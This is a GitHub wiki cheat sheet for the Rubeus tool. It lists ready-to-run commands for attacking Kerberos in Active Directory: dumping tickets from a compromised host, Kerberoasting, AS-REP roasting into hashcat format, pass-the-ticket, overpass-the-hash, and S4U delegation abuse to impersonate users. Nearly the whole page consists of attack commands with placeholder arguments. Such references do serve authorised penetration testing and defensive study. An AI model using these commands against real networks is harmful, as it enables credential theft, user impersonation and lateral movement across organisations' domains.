Rubeus - CraigDonkin/Infrastructure GitHub Wiki

Rubeus

https://github.com/GhostPack/Rubeus

List kerberos tickets

  • This will list the Kerberos tickets in the current session.
    • If it is run from an admin shell, it will get kerberos tickets for every session on the compromised host.
Rubeus.exe triage
  • Monitor time is in seconds. You can use /runfor:<seconds> to set a period.
  • If trying to target a specific user then use /targetuser:<user> 
Rubeus monitor /interval:<interval> /nowrap
Rubeus monitor /interval:<interval> /targetuser:<user>

Extract kerberos tickets

  • Use the dump command. If low privileged it will only dump tickets for current user, if high privileged it will dump tickets for every session.
Rubeus.exe dump
  • To dump a specific ticket, use the /luid and '/service` parameters.
Rubeus.exe dump /luid:<luid> /service:<service>
  • The /nowrap option will format the base64 onto a single line.

Kerberoast

Rubeus.exe kerberoast
Rubeus.exe kerberoast /user:<username> /nowrap

ASREProast

Rubeus.exe asreproast /user:<username> /nowrap
Rubeus.exe asreproast /format:hashcat /outfile:<outputfile> /user:<username>

Pass the ticket

Rubeus.exe ptt /luid:<luid> /ticket:<base64 encoded ticket>
Rubeus.exe ptt /ticket:<.kirbi file>

Overpass the hash

Rubeus.exe asktgt /user:<username> /ntlm:<ntlm hash> /nowrap

If you want a TGT encrypted with AES256:

Rubeus.exe asktgt /user:<username> /aes256:<aes256 hash> /nowrap

Createnetonly

  • The equivalent of runas /netonly
  • Creates a new hidden process which can be used to apply a specific TGT to.
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<domain> /username:<username> /password:<password> /ticket:<TGT>

s4u

Rubeus.exe s4u /user:<user with delegation rights> /rc4:<RC4 hash> /impersonateuser:<user to be impersonated>
Rubeus.exe s4u /impersonateuser:<user to be impersonated> /msdsspn:<SPN that /user can delegate to> /user:<user with delegation rights> /ticket:<TGT for /user>
  • The SPN information in a ticket, is not encrypted and can be changed using the /altservice.
Rubeus.exe s4u /impersonateuser:<user to be impersonated> /msdsspn:<SPN that /user can delegate to> /user:<user with delegation rights> /altservice:ldap /ticket:<TGT for /user>

Hash

  • Generates the rc4_hmac of the password.
  • If the user and domain are specified it also gets other hash forms such as aes ones.
Rubeus.exe hash /password:<password> /user:<computername>$ /domain:<domain>
⚠️ **GitHub.com Fallback** ⚠️